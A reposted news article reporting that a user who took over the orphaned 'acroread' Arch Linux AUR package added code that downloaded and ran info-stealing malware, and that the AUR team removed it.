Malware Found in Arch Linux AUR Package Repository

 
Info-stealer found in “acroread” Arch Linux package

The incident happened because AUR allows anyone to take over “orphaned” repositories that have been abandoned by their original authors.

On Saturday, a user going by the pseudonym of “xeactor” took over one such orphaned package named “acroread” that allows Arch Linux users to view PDF files.

According to a Git commit to the package’s source code, xeactor added malicious code that would download a file named “~x” from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.

When the user would install the xeactor package, the user’s PC would download and execute the ~x file [VirusTotal, source code], which would later download and run another file named “~u” [VirusTotal, source code].

Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file at every 360 seconds.

The AUR team also said it found similar code in two other packages that the xeactor user has recently taken over, but has not revealed their names.

The Arch Linux team is the second Linux distro that has found malware on its user-submitted package repository this year. In May, the Ubuntu Store team found a cryptocurrency miner hidden in an Ubuntu package named 2048buntu.

The malicious code has been removed thanks to the quick intervention of the AUR team.

Source: Bleeping Computer

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.